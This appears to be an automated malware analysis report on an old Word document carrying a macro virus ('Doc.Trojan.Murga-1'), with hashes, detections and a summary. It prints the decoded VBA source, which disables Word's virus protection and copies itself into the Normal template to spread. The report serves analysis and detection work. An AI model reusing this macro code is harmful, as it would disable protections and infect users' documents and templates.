Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4b0d909f5a9dd5d3…

MALICIOUS

Office (OLE)

53.0 KB Created: 2000-12-13 23:16:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 874c8e6221b28292662a4c0e1de21ebf SHA-1: 8c7f28545025ea88163e2490e85df7f924aa65b4 SHA-256: 4b0d909f5a9dd5d369452e52e4c971df5314742cb9ba67561e3b54d2d1cf39e9
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros that attempt to disable virus protection and save a component named 'nofrx' to 'c:\sys.sys'. This component is then imported into the Normal template, suggesting an attempt at persistence or propagation. The ClamAV detection 'Doc.Trojan.Murga-1' and the embedded artifact signature 'Win.Trojan.C-286' further indicate malicious intent.

Heuristics 2

  • ClamAV: Doc.Trojan.Murga-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Murga-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1137 bytes
SHA-256: 38d2484f5fe1d2d5776509028ef7e9518ac484b9373a1a9ee79bd98799f26f06
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FilePrint()
' NofrX.a by e[ax] ´98
' Special greetinz goes to -=PU=-
On Error GoTo kraj
 
With Options
    
    .VirusProtection = False
    .SaveNormalPrompt = False
    .ConfirmConversions = False
    
End With

If (Month(Now) = 7) And (Day(Now) = 7) Then

    MsgBox ("Danas je rodjendan Murga-drotu!!!! Ohoooooo!"), vbInformation
    ActiveDocument.VBProject.VBComponents.Item("nofrx").Export ("c:\sys.sys")
    NormalTemplate.VBProject.VBComponents.Import ("c:\sys.sys")
    
    If NormalTemplate.VBProject.VBComponents.Item("nofrx").Name <> "nofrx" Then
    NormalTemplate.VBProject.VBComponents.Import ("c:\sys.sys")
    End If
    If ActiveDocument.VBProject.VBComponents.Item("nofrx").Name <> "nofrx" Then
    ActiveDocument.VBProject.VBComponents.Import ("c:\sys.sys")
    End If
    
End If
kraj:
End Sub